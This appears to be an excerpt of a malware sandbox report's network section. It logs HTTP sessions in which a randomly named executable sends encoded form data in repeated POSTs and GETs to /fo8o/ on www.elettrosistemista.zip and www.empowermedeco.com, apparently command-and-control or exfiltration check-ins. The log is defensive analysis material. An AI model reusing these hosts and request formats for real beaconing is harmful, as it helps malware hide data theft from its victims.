                                                                                    Data Ascii: FPJps=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                    Jan 7, 2025 15:34:58.703078032 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:58 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.549994195.110.124.133803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:35:00.552124977 CET821OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77
                                                                                    Data Ascii: FPJps=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                    Jan 7, 2025 15:35:01.233527899 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:35:01 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.549995195.110.124.133803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:35:03.084131002 CET1838OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 [TRUNCATED]
                                                                                    Data Ascii: FPJps=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnfFygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQSEc [TRUNCATED]
                                                                                    Jan 7, 2025 15:35:03.743637085 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:35:03 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.549996195.110.124.133803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:35:05.612638950 CET526OUTGET /fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:35:06.335695028 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:35:06 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.549997217.196.55.202803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:35:27.693969965 CET789OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d
                                                                                    Data Ascii: FPJps=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                    Jan 7, 2025 15:35:28.277826071 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:28 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.549998217.196.55.202803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:35:30.222574949 CET809OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65
                                                                                    Data Ascii: FPJps=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                    Jan 7, 2025 15:35:30.787947893 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:30 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.549999217.196.55.202803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:35:32.753498077 CET1826OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
